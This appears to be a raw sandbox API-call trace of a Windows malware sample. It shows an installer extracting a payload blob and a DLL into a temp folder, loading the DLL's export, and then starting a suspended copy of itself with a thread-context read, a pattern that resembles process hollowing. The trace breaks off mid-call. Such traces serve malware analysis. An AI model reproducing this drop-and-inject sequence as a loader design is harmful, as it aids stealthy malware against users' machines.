GetLastError () returned 0xb7 [0270.164] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0270.165] GetModuleHandleA (lpModuleName="SHELL32") returned 0x761c0000 [0270.165] GetProcAddress (hModule=0x761c0000, lpProcName=0x2a8) returned 0x7646db90 [0270.166] IsUserAnAdmin () returned 0 [0270.167] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsce967.tmp"), lpSecurityAttributes=0x0) returned 1 [0270.167] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp" [0270.167] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned 48 [0270.167] lstrcpynA (in: lpString1=0x409c40, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp" [0270.167] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned 48 [0270.167] lstrcpynA (in: lpString1=0x435800, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp" [0270.167] lstrcpynA (in: lpString1=0x42f000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0270.167] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0270.167] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0270.168] lstrcpynA (in: lpString1=0x40a040, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0270.168] CreateDirectoryA (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0270.168] GetLastError () returned 0xb7 [0270.168] GetFileAttributesA (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0270.168] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0270.168] GetLastError () returned 0xb7 [0270.168] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0270.168] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0270.168] GetLastError () returned 0xb7 [0270.168] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0270.168] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0270.169] GetLastError () returned 0xb7 [0270.169] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0270.169] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0270.169] GetLastError () returned 0xb7 [0270.169] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0270.169] lstrcpynA (in: lpString1=0x434800, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0270.170] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 1 [0270.181] lstrcpynA (in: lpString1=0x40a840, lpString2="4gyujazywsbdaoe", iMaxLength=1024 | out: lpString1="4gyujazywsbdaoe") returned="4gyujazywsbdaoe" [0270.181] lstrcpynA (in: lpString1=0x409c40, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0270.181] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0270.181] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0270.181] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="4gyujazywsbdaoe" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\4gyujazywsbdaoe") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\4gyujazywsbdaoe" [0270.181] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\4gyujazywsbdaoe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\4gyujazywsbdaoe")) returned 0x20 [0270.183] SetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\4gyujazywsbdaoe", dwFileAttributes=0x20) returned 1 [0270.184] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\4gyujazywsbdaoe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\4gyujazywsbdaoe")) returned 0x20 [0270.184] CreateFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\4gyujazywsbdaoe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\4gyujazywsbdaoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0x28 [0270.185] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=40688, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ef0 [0270.185] ReadFile (in: hFile=0x1ec, lpBuffer=0x19f798, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x19f798*, lpNumberOfBytesRead=0x19f71c*=0x4, lpOverlapped=0x0) returned 1 [0270.185] GetTickCount () returned 0xe975 [0270.185] ReadFile (in: hFile=0x1ec, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0270.188] GetTickCount () returned 0xe985 [0270.188] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x4f91, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x4f91, lpOverlapped=0x0) returned 1 [0270.192] GetTickCount () returned 0xe985 [0270.192] ReadFile (in: hFile=0x1ec, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0270.192] GetTickCount () returned 0xe985 [0270.192] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x41a9, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x41a9, lpOverlapped=0x0) returned 1 [0270.193] GetTickCount () returned 0xe985 [0270.193] ReadFile (in: hFile=0x1ec, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0270.193] GetTickCount () returned 0xe985 [0270.193] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x4279, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x4279, lpOverlapped=0x0) returned 1 [0270.194] GetTickCount () returned 0xe985 [0270.194] ReadFile (in: hFile=0x1ec, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0270.194] GetTickCount () returned 0xe985 [0270.194] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x42d5, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x42d5, lpOverlapped=0x0) returned 1 [0270.195] GetTickCount () returned 0xe985 [0270.195] ReadFile (in: hFile=0x1ec, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0270.195] GetTickCount () returned 0xe985 [0270.195] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x4259, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x4259, lpOverlapped=0x0) returned 1 [0270.196] GetTickCount () returned 0xe985 [0270.196] ReadFile (in: hFile=0x1ec, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0270.196] GetTickCount () returned 0xe985 [0270.196] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x453b, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x453b, lpOverlapped=0x0) returned 1 [0270.197] GetTickCount () returned 0xe985 [0270.197] ReadFile (in: hFile=0x1ec, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0270.197] GetTickCount () returned 0xe985 [0270.197] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x40b3, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x40b3, lpOverlapped=0x0) returned 1 [0270.197] GetTickCount () returned 0xe985 [0270.197] ReadFile (in: hFile=0x1ec, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0270.198] GetTickCount () returned 0xe985 [0270.198] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x4000, lpOverlapped=0x0) returned 1 [0270.198] GetTickCount () returned 0xe985 [0270.198] ReadFile (in: hFile=0x1ec, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0270.199] GetTickCount () returned 0xe985 [0270.199] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x3fd2, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x3fd2, lpOverlapped=0x0) returned 1 [0270.199] GetTickCount () returned 0xe985 [0270.199] ReadFile (in: hFile=0x1ec, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0270.200] GetTickCount () returned 0xe985 [0270.200] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x4166, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x4166, lpOverlapped=0x0) returned 1 [0270.200] GetTickCount () returned 0xe985 [0270.200] ReadFile (in: hFile=0x1ec, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0270.200] GetTickCount () returned 0xe985 [0270.200] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x3ff8, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x3ff8, lpOverlapped=0x0) returned 1 [0270.201] GetTickCount () returned 0xe985 [0270.201] ReadFile (in: hFile=0x1ec, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0270.201] GetTickCount () returned 0xe985 [0270.201] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x4000, lpOverlapped=0x0) returned 1 [0270.202] GetTickCount () returned 0xe985 [0270.202] ReadFile (in: hFile=0x1ec, lpBuffer=0x414c48, nNumberOfBytesToRead=0x2f36, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x2f36, lpOverlapped=0x0) returned 1 [0270.202] GetTickCount () returned 0xe985 [0270.202] MulDiv (nNumber=208694, nNumerator=100, nDenominator=208694) returned 100 [0270.202] wsprintfA (in: param_1=0x19f72c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0270.202] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x2f33, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x2f33, lpOverlapped=0x0) returned 1 [0270.202] SetFileTime (hFile=0x28, lpCreationTime=0x19f928, lpLastAccessTime=0x0, lpLastWriteTime=0x19f928) returned 1 [0270.203] CloseHandle (hObject=0x28) returned 1 [0270.208] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp" [0270.208] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned 48 [0270.208] lstrcpynA (in: lpString1=0x40a440, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp" [0270.208] lstrcpynA (in: lpString1=0x40a840, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0270.208] lstrcmpiA (lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp", lpString2="") returned 1 [0270.208] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp" [0270.208] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned 48 [0270.208] lstrcpynA (in: lpString1=0x40a840, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp\\akepwc.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp\\akepwc.dll") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp\\akepwc.dll" [0270.208] lstrcpynA (in: lpString1=0x409c40, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp\\akepwc.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp\\akepwc.dll") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp\\akepwc.dll" [0270.209] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp\\akepwc.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsce967.tmp\\akepwc.dll")) returned 0xffffffff [0270.209] CreateFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp\\akepwc.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsce967.tmp\\akepwc.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0270.209] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=249386, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3ce2a [0270.209] ReadFile (in: hFile=0x1ec, lpBuffer=0x19f798, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x19f798*, lpNumberOfBytesRead=0x19f71c*=0x4, lpOverlapped=0x0) returned 1 [0270.210] GetTickCount () returned 0xe994 [0270.210] ReadFile (in: hFile=0x1ec, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0270.276] GetTickCount () returned 0xe9d3 [0270.276] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x8000, lpOverlapped=0x0) returned 1 [0270.278] GetTickCount () returned 0xe9d3 [0270.278] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x3547, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x3547, lpOverlapped=0x0) returned 1 [0270.278] GetTickCount () returned 0xe9d3 [0270.278] ReadFile (in: hFile=0x1ec, lpBuffer=0x414c48, nNumberOfBytesToRead=0x537, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x537, lpOverlapped=0x0) returned 1 [0270.278] GetTickCount () returned 0xe9d3 [0270.278] MulDiv (nNumber=17719, nNumerator=100, nDenominator=17719) returned 100 [0270.278] wsprintfA (in: param_1=0x19f72c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0270.278] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x6b9, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x6b9, lpOverlapped=0x0) returned 1 [0270.279] CloseHandle (hObject=0x28) returned 1 [0270.280] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp" [0270.280] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp") returned 48 [0270.280] lstrcpynA (in: lpString1=0x40a040, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp\\akepwc.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp\\akepwc.dll") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp\\akepwc.dll" [0270.280] lstrcpynA (in: lpString1=0x409c40, lpString2="TclpOwkq", iMaxLength=1024 | out: lpString1="TclpOwkq") returned="TclpOwkq" [0270.280] GetModuleHandleA (lpModuleName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp\\akepwc.dll") returned 0x0 [0270.281] LoadLibraryExA (lpLibFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nscE967.tmp\\akepwc.dll", hFile=0x0, dwFlags=0x8) returned 0x71f30000 [0270.527] GetProcAddress (hModule=0x71f30000, lpProcName="TclpOwkq") returned 0x71f37500 [0270.528] VirtualAlloc (lpAddress=0x0, dwSize=0xbebc200, flAllocationType=0x3000, flProtect=0x4) returned 0x2600000 [0276.129] EnumResourceTypesA (hModule=0x0, lpEnumFunc=0x71f3a000, lParam=0x0) [0276.135] LoadLibraryW (lpLibFileName="Shlwapi.dll") returned 0x759b0000 [0276.137] GetTempPathW (in: nBufferLength=0x103, lpBuffer=0x19f1c8 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0276.139] PathAppendW (in: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", pMore="4gyujazywsbdaoe" | out: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\4gyujazywsbdaoe") returned 1 [0276.140] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\4gyujazywsbdaoe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\4gyujazywsbdaoe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0276.141] GetFileSize (in: hFile=0x240, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x34f32 [0276.141] VirtualAlloc (lpAddress=0x0, dwSize=0x34f32, flAllocationType=0x3000, flProtect=0x4) returned 0xe4c0000 [0276.142] ReadFile (in: hFile=0x240, lpBuffer=0xe4c0000, nNumberOfBytesToRead=0x34f32, lpNumberOfBytesRead=0x19f5d8, lpOverlapped=0x0 | out: lpBuffer=0xe4c0000*, lpNumberOfBytesRead=0x19f5d8*=0x34f32, lpOverlapped=0x0) returned 1 [0276.147] CloseHandle (hObject=0x240) returned 1 [0276.173] LoadLibraryW (lpLibFileName="ntdll.dll") returned 0x77ce0000 [0276.174] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19eccc, nSize=0x103 | out: lpFilename="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe")) returned 0x31 [0276.174] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19e548, nSize=0x103 | out: lpFilename="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe")) returned 0x31 [0276.174] GetCommandLineW () returned="\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\" " [0276.174] CreateProcessW (in: lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine="\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19ec24*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19ec88 | out: lpCommandLine="\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\" ", lpProcessInformation=0x19ec88*(hProcess=0x244, hThread=0x240, dwProcessId=0xd08, dwThreadId=0xd0c)) returned 1 [0276.202] GetThreadContext (in: hThread=0x240, lpContext=0x19e958 | out: lpContext=0x19e958*(ContextFlags=0x10007, Dr0=0x77ce4090, Dr1=0x46f58, Dr2=0x1, Dr3=0x46f44, Dr6=0xffaa1b6c, Dr7=0x19e9a8, FloatSave.ControlWord=0x77d3f91c, FloatSave.StatusWord=0xc671b4ac, FloatSave.TagWord=0x19ec8c, FloatSave.ErrorOffset=0x57, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x1, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x78, [1]=0xe9, [2]=0x19, [3]=0x0, [4]=0x7e, [5]=0xc4, [6]=0xc1, [7]=0xf5, [8]=0xac, [9]=0xee, [10]=0x19, [11]=0x0, [12]=0x30, [13]=0xee, [14]=0xd5, [15]=0x77, [16]=0x7c, [17]=0x7d, [18]=0xb5, [19]=0xb1, [20]=0xfe, [21]=0xff, [22]=0xff, [23]=0xff, [24]=0x34, [25]=0xec, [26]=0x19, [27]=0x0, [28]=0x98, [29]=0x8d, [30]=0xd1, [31]=0x77, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x25, [37]=0x2, [38]=0x0, [39]=0xc0, [40]=0x78, [41]=0xec, [42]=0x19, [43]=0x0, [44]=0xc0, [45]=0x47, [46]=0x5c, [47]=0x0, [48]=0xad, [49]=0x8d, [50]=0xd1, [51]=0x77, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0xd8, [69]=0x15, [70]=0x59, [71]=0x0, [72]=0x9, [73]=0x1, [74]=0x1, [75]=0x1, [76]=0x14, [77]=0x16, [78]=0x59, [79]=0x0), FloatSave.Cr0NpxState=0xf46857d4, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, 